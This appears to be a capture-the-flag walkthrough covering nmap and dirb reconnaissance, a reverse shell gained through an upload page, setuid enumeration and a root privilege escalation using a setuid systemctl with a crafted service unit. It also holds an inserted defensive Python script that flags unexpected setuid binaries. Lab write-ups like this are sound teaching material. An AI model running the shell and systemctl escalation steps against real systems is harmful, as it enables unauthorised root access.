Technology with Security
24 June 2020
Focuses on active recon, web app attacks and privilege escalation.
Gather information about the machine using tools such as nmap. Always perform reconnaissance thoroughly before progressing.
nmap -v -A -sV -sC -p- -Pn -oN nmap.out 10.10.228.44
-A : Aggressive scan; enables OS detection, version detection, default scripts and traceroute
-sV : Discovers the services with their versions
-sC : Scan with the default nmap scripts
-p- : Scan all 65535 ports
-Pn : Skip host discovery (treat the host as up) and go straight to the port scan
-oN : Save the output to a file
Result:
Using dirb, scan the HTTP service to find directories.
dirb http://10.10.228.44:3333/ /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Result:
GENERATED WORDS: 87568
---- Scanning URL: http://10.10.228.44:3333/ ----
==> DIRECTORY: http://10.10.228.44:3333/images/
==> DIRECTORY: http://10.10.228.44:3333/css/
==> DIRECTORY: http://10.10.228.44:3333/js/
==> DIRECTORY: http://10.10.228.44:3333/fonts/
==> DIRECTORY: http://10.10.228.44:3333/internal/
Navigated to these directories and found that /internal/ is hosting an upload page.
Start a listener for the reverse shell:
nc -nlvp 4444
The uploaded file is served from /internal/uploads/ and the reverse shell connection is established.
Enumerate setuid binaries on the box (list each match with ls -ld, discarding permission errors):
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
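A defender's counterpart to the setuid enumeration above, as an added example that is not part of the original post: a Python audit that parses the output of `find / -perm /4000 -type f -exec ls -ld {} \;` and reports setuid binaries that are missing from a known-good baseline (an unexpected setuid systemctl is exactly the kind of finding it surfaces). The baseline set and the sample `ls -ld` lines are constructed here; a real audit should derive the baseline from the distribution's package manifest.

```python
import re
from typing import Iterable, List

# Constructed baseline of setuid binaries expected on a typical Debian/Ubuntu
# host. Replace with the paths listed in the distribution's package manifest.
SUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# One line of `ls -ld` output: mode (optional SELinux/ACL marker), link count,
# owner, group, size, three date tokens ("May 28  2020" or "Jan 26 09:15"), path.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})[.+]?\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+"
    r"\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$"
)

def unexpected_suid(ls_lines: Iterable[str], baseline=SUID_BASELINE) -> List[str]:
    """Return the paths of setuid files that are not in the baseline."""
    findings = []
    for line in ls_lines:
        m = LS_LINE.match(line.strip())
        if not m:
            continue  # blank line, header, or a line find could not stat
        mode, path = m.group("mode", "path")
        # The owner-execute slot shows 's' (setuid + exec) or 'S' (setuid, no exec).
        if mode[3] in "sS" and path not in baseline:
            findings.append(path)
    return findings

# Constructed sample output from the find/ls -ld command above.
SAMPLE_LS_OUTPUT = [
    "-rwsr-xr-x 1 root root 68208 May 28  2020 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root 659856 Jan 26  2020 /bin/systemctl",
    "-rwxr-xr-x 1 root root 138856 Jan 18 09:15 /usr/bin/ls",
    "-rwSr-xr-x 1 root root 1024 Feb  2 11:00 /opt/legacy/helper",
]

if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_LS_OUTPUT):
        print(f"unexpected setuid binary: {path}")
```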
# $eob holds the path of a writable unit file ending in .service (its definition is not shown in the post)
$ echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/flag.txt"
[Install]
WantedBy=multi-user.target' > $eob
$ /bin/systemctl link $eob
$ /bin/systemctl enable --now $eob